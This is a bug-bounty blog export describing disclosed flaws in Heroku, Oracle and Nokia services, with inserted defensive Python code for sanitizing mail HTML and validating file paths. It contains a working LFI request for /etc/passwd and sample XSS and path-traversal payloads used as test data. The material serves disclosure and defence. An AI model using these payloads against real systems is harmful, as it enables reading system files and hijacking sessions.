<a href="http://2.bp.blogspot.com/-fJETqX32ou0/Up36zmrdGhI/AAAAAAAABeA/DUx4hWDlMx4/s1600/reply.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://2.bp.blogspot.com/-fJETqX32ou0/Up36zmrdGhI/AAAAAAAABeA/DUx4hWDlMx4/s400/reply.PNG" width="400" /></a></div>
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span> Later they even started their hall of fame page and included my name there :)<span style="background-color: white;"><span style="color: #222222; font-family: "arial" , sans-serif; font-size: x-small;"><span style="line-height: 16px;"><br /></span></span></span><a href="https://www.heroku.com/policy/security-hall-of-fame">https://www.heroku.com/policy/security-hall-of-fame</a><br />
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span> <span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2VY3RzpPr5M/Up37jieF7xI/AAAAAAAABeM/h63VRh62AgY/s1600/hof.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://1.bp.blogspot.com/-2VY3RzpPr5M/Up37jieF7xI/AAAAAAAABeM/h63VRh62AgY/s400/hof.PNG" width="400" /></a></div>
<br />
<br /></div>
Shashank http://www.blogger.com/profile/06316076880219448675 noreply@blogger.com 2
tag:blogger.com,1999:blog-499911195830393683.post-2605131209232883286 2013-11-17T14:08:00.002+05:30 2019-08-17T15:41:35.363+05:30
Oracle xss<div dir="ltr" style="text-align: left;" trbidi="on">
Everyone knows about Oracle. Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.<br />
<div>
<br /></div>
<div>
I spotted some security issues on their website, and finally they have fixed them. One of them was a cross-site scripting issue in Oracle's subdomain <a href="http://education.oracle.com/">http://education.oracle.com</a> </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-kKjzPZNyrs0/Uoh-VnNbU4I/AAAAAAAABdE/QeStUUlmimU/s1600/oracalxss2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://1.bp.blogspot.com/-kKjzPZNyrs0/Uoh-VnNbU4I/AAAAAAAABdE/QeStUUlmimU/s400/oracalxss2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
They took a long time to fix it, but after the fix they acknowledged me on their website.</div>
<div>
<br /></div>
<div>
Oracle Critical Patch Update Advisory - January 2013 - Beta Oracle CVRF</div>
<div>
<a href="http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841213.xml">http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841213.xml</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-vYEHh6fKK0M/Uoh_srPr6nI/AAAAAAAABdQ/flh3k-b-ZZI/s1600/oraclehof.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://3.bp.blogspot.com/-vYEHh6fKK0M/Uoh_srPr6nI/AAAAAAAABdQ/flh3k-b-ZZI/s400/oraclehof.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br />
And </div>
<div>
Oracle Critical Patch Update Advisory - July 2013 - Beta Oracle CVRF</div>
<div>
<a href="http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841215.xml">http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841215.xml</a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aEiaXAQYCtM/UoiAPksDu9I/AAAAAAAABdY/ta3ZH_JZxFQ/s1600/oraclehof2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://2.bp.blogspot.com/-aEiaXAQYCtM/UoiAPksDu9I/AAAAAAAABdY/ta3ZH_JZxFQ/s320/oraclehof2.PNG" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
cheers :)<br />
<br /></div>
</div>
Shashank http://www.blogger.com/profile/06316076880219448675 noreply@blogger.com 0
tag:blogger.com,1999:blog-499911195830393683.post-35913634067270025 2013-10-22T18:27:00.001+05:30 2019-08-17T15:42:43.315+05:30
Nokia email app pwnage <div dir="ltr" style="text-align: left;" trbidi="on">
This was an interesting bug which I found in the Nokia email app for Symbian mobiles in MARCH 2013.<br />
The email app was not filtering JavaScript in the body of the mail, which led to JavaScript execution via mail.<br />
<br />
<b><br /></b><b>THE VERSION OF NOKIA MAIL: 10.2.0.29(main)</b><b><br /></b><b>NOKIA 5233 FIRMWARE COMPLETE DETAILS<br />software version: v51.1.002<br />software version date: 19-10-2011<br />custom version : 51.1.002.C01.01<br />custom version date: 19-10-2011<br />language set: 21<br />Model: 5233<br />type: Rm-625</b><span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"><br /></span>
<br />
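The root cause above is a mail renderer that displays untrusted HTML without removing active content. As an added example written for this post (not Nokia's mail client code), the Python below is an allowlist-based sanitizer that strips script and similar elements, event-handler attributes and javascript:/data: URLs before a body is rendered, and reports what it removed so the client can log it. The tag and attribute allowlists and the sample message are assumptions constructed for the demo.

```python
"""Allowlist-based sanitizer for HTML e-mail bodies.

Example code written for this post (not Nokia's mail client). The tag and
attribute allowlists and the sample message are assumptions for the demo.
"""
from __future__ import annotations

from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags a mail renderer legitimately needs; anything else is stripped.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img", "ul",
                "ol", "li", "table", "tr", "td", "th", "div", "span"}
# Attributes kept per tag; on* handlers are never in these sets.
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
# Elements whose content is dropped as well (script, style, embedded frames).
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "svg"}
VOID_TAGS = {"br", "img"}
# URL schemes allowed in href/src; javascript:, data:, file: are rejected.
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(value: str) -> bool:
    """True for relative URLs and absolute URLs with an allowed scheme."""
    # Browsers ignore control characters and whitespace inside URLs, so
    # remove them first; otherwise "java\nscript:" would parse as relative.
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class MailBodySanitizer(HTMLParser):
    """Re-serialises the body keeping only allowlisted tags and attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitised fragments
        self.dropped = []    # what was removed, for logging
        self._skip = 0       # >0 while inside a DROP_CONTENT tag

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.dropped.append(tag)
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            if not self._skip:
                self.dropped.append(tag)   # unknown tag: keep its text only
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                if name.startswith("on"):
                    self.dropped.append(f"{tag}@{name}")
                continue
            if name in ("href", "src") and not safe_url(value or ""):
                self.dropped.append(f"{tag}@{name}={value}")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        close = " /" if tag in VOID_TAGS else ""
        self.out.append(f"<{tag}{''.join(kept)}{close}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip = max(0, self._skip - 1)
            return
        if not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            # convert_charrefs decoded entities, so re-escape on output.
            self.out.append(escape(data, quote=False))


def sanitize_with_report(body: str) -> tuple[str, list[str]]:
    """Return (sanitised body, list of removed tags/attributes)."""
    parser = MailBodySanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.dropped


def sanitize_mail_body(body: str) -> str:
    """Return only the sanitised body."""
    return sanitize_with_report(body)[0]


# Constructed sample of a hostile message body.
SAMPLE_BODY = (
    "<p>Hello <b>Shashank</b></p>"
    "<script>alert(document.cookie)</script>"
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="https://example.com/">ok</a>'
    '<font color="red">styled</font>'
)

if __name__ == "__main__":
    clean, removed = sanitize_with_report(SAMPLE_BODY)
    print(clean)
    print("removed:", removed)
```

The sanitizer is deliberately an allowlist: anything it does not recognise is dropped rather than passed through, which is what a mail client needs, since the sender controls every byte of the body.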
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-yN9jfi7i-oI/UmZyakC8RpI/AAAAAAAABak/ogdiSCK8_74/s1600/Screen2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://4.bp.blogspot.com/-yN9jfi7i-oI/UmZyakC8RpI/AAAAAAAABak/ogdiSCK8_74/s400/Screen2.jpg" width="225" /></a></div>
<br />
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"><br /></span>
<br />
<br />
<br />
<br />
<br />
This bug took a long time to fix, but when they finally did ;-) I got a mail from Nokia<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-pYtgGEy-ohs/UmZ0U69unlI/AAAAAAAABas/oNVtj3DmmVQ/s1600/emal.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://2.bp.blogspot.com/-pYtgGEy-ohs/UmZ0U69unlI/AAAAAAAABas/oNVtj3DmmVQ/s320/emal.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
TRIBUTE TO MY OLD PAL "NOKIA 5233", which passed away recently, breaking its screen, sound system and everything else after slipping out of my hand.</div>
Shashank http://www.blogger.com/profile/06316076880219448675 noreply@blogger.com 0
tag:blogger.com,1999:blog-499911195830393683.post-7027140420754595338 2013-10-22T17:37:00.001+05:30 2019-08-17T15:43:18.594+05:30
LFI in Nokia maps <div dir="ltr" style="text-align: left;" trbidi="on">
Well, this is my first blog post, and I am going to share a Local File Inclusion bug which I spotted in Nokia maps.<br />
<br />
<b>http://maps.nokia.com/services/file:///etc/passwd</b><br />
<br />
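Both this bug and the Heroku directory traversal above come from a service that takes a caller-supplied resource reference and reads it without checking the scheme or the resolved path. As an added example written for this blog (not Nokia's or Heroku's code), the Python below shows the two checks a defender wants on such a handler: a local reference must resolve strictly under a base directory after full percent-decoding, and a remote reference must be an http(s) URL to an allowlisted host with no embedded credentials. The base directory, host allowlist and sample references are assumptions constructed for the demo.

```python
"""Reference validation for a resource-fetching endpoint.

Example code written for this blog (not Nokia's or Heroku's); the base
directory, host allowlist and sample references are assumptions.
"""
import posixpath
from urllib.parse import unquote, urlsplit

LOCAL_BASE = "/srv/maps/services"      # assumed: only files below here are served
REMOTE_HOSTS = {"tiles.example.com"}   # assumed: only these hosts may be fetched
MAX_DECODE_ROUNDS = 3


def fully_decode(ref: str) -> str:
    """Percent-decode until stable, so %252e%252e cannot hide a dot-dot."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(ref)
        if decoded == ref:
            return ref
        ref = decoded
    raise ValueError("reference is percent-encoded too many times")


def safe_local_path(ref: str, base: str = LOCAL_BASE) -> str:
    """Map a relative reference to a file strictly under base, or raise."""
    base = posixpath.normpath(base)
    ref = fully_decode(ref)
    if "\x00" in ref or "\\" in ref:
        raise ValueError("forbidden character in reference")
    if urlsplit(ref).scheme:
        # file:///etc/passwd, http://..., etc. are URLs, not local names.
        raise ValueError("local reference must not carry a URL scheme")
    if ref.startswith("/"):
        raise ValueError("absolute path not allowed")
    joined = posixpath.normpath(posixpath.join(base, ref))
    # normpath collapses dot-dot segments; the result must still sit
    # inside base, otherwise the reference walked out of it.
    if joined != base and not joined.startswith(base + "/"):
        raise ValueError("path escapes the service directory")
    return joined


def safe_remote_url(ref: str, allowed_hosts=REMOTE_HOSTS) -> str:
    """Allow only http(s) URLs to an allowlisted host, without credentials."""
    parts = urlsplit(ref.strip())
    if parts.scheme.lower() not in {"http", "https"}:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        raise ValueError(f"host {host!r} not in allowlist")
    return parts.geturl()


def is_rejected(check, ref: str) -> bool:
    """True when the check raises ValueError for ref."""
    try:
        check(ref)
    except ValueError:
        return True
    return False


# Constructed references: one legitimate request and the shapes seen in
# the two write-ups (file: scheme, dot-dot, encoded and double-encoded).
SAMPLES = [
    "tiles/12/34.png",
    "file:///etc/passwd",
    "../../etc/passwd",
    "/etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
    "..%252f..%252fetc/passwd",
]

if __name__ == "__main__":
    for ref in SAMPLES:
        try:
            print(f"{ref!r:32} -> {safe_local_path(ref)}")
        except ValueError as exc:
            print(f"{ref!r:32} -> rejected: {exc}")
```

The check is done on the normalised result rather than by searching the input for "..", because encoded, doubled and mixed-separator forms of the same traversal are otherwise easy to miss; a deployment that serves from a real directory should additionally resolve symlinks before the containment test.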
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-piQCcrucQTE/UmaaBQe-xGI/AAAAAAAABa8/YRe_vS1Erwg/s1600/nokiaLFI.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="236" src="https://3.bp.blogspot.com/-piQCcrucQTE/UmaaBQe-xGI/AAAAAAAABa8/YRe_vS1Erwg/s400/nokiaLFI.jpg" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Reported on 2nd JAN 2013.<br />
Nokia fixed it on 20th JAN 2013.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-GcKVX3g1BvA/UmZpEo62t_I/AAAAAAAABaU/IJQr-UoZ1sw/s1600/nokia.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://4.bp.blogspot.com/-GcKVX3g1BvA/UmZpEo62t_I/AAAAAAAABaU/IJQr-UoZ1sw/s400/nokia.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And I received an awesome RED NOKIA LUMIA 920 :)<br />
<br /></div>
Shashank http://www.blogger.com/profile/06316076880219448675 noreply@blogger.com 0